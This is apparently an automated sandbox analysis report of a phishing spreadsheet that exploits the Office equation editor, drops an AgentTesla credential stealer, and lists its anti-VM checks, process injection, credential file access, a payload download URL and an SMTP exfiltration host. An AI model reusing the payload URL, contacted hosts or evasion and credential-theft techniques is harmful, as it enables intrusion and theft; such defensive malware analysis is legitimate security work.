Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: Request for Quotation (RFQ).xlsx Metadefender: Detection: 28%
Source: Request for Quotation (RFQ).xlsx ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Request for Quotation (RFQ).xlsx Static file information: File size 1262080 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: NativeObjectSecurity.pdb( source: vbc.exe, 00000004.00000002.2140067412.0000000000902000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2139065825.0000000000902000.00000020.00020000.sdmp, vbc.exe.2.dr
Source: Binary string: NativeObjectSecurity.pdb source: vbc.exe, vbc.exe.2.dr
Source: Request for Quotation (RFQ).xlsx Initial sample: OLE indicators vbamacros = False
Source: Request for Quotation (RFQ).xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00908194 push 20060002h; retf 4_2_009081A1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00461568 push FFFFFF8Bh; retf 4_2_0046156A
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F18998 push eax; retf 002Fh 4_2_01F18999
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F18351 push esp; retf 002Fh 4_2_01F18352
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F14293 push esp; retf 002Fh 4_2_01F1429D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00908194 push 20060002h; retf 5_2_009081A1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00231335 pushfd ; iretd 5_2_002313D9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00231390 pushfd ; iretd 5_2_002313D9
Source: initial sample Static PE information: section name: .text entropy: 7.66771174726

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dan[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\vbc.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Request for Quotation (RFQ).xlsx Stream path 'EncryptedPackage' entropy: 7.99983327297 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2904, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9258 Jump to behavior
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 489 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2716 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2836 Thread sleep time: -104613s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2984 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2440 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2956 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2956 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2288 Thread sleep count: 9258 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2288 Thread sleep count: 489 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2956 Thread sleep count: 101 > 30 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 104613 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000 Jump to behavior
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: vbc.exe, 00000005.00000002.2351141721.0000000000B70000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2351141721.0000000000B70000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2351141721.0000000000B70000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2904, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2904, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 435319 Sample: Request for Quotation (RFQ).xlsx Startdate: 16/06/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected AgentTesla 2->35 37 11 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 25 2->12         started        process3 dnsIp4 29 192.227.228.121, 49165, 80 AS-COLOCROSSINGUS United States 7->29 21 C:\Users\user\AppData\Local\...\dan[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\...\~$Request for Quotation (RFQ).xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->51 53 Injects a PE file into a foreign processes 14->53 17 vbc.exe 4 14->17         started        process9 dnsIp10 27 us2.smtp.mailhostbox.com 208.91.198.143, 49166, 587 PUBLIC-DOMAIN-REGISTRYUS United States 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.91.198.143
 us2.smtp.mailhostbox.com United States
394695 PUBLIC-DOMAIN-REGISTRYUS false
192.227.228.121
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
us2.smtp.mailhostbox.com 208.91.198.143 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.227.228.121/dan.exe true
  • Avira URL Cloud: safe
 unknown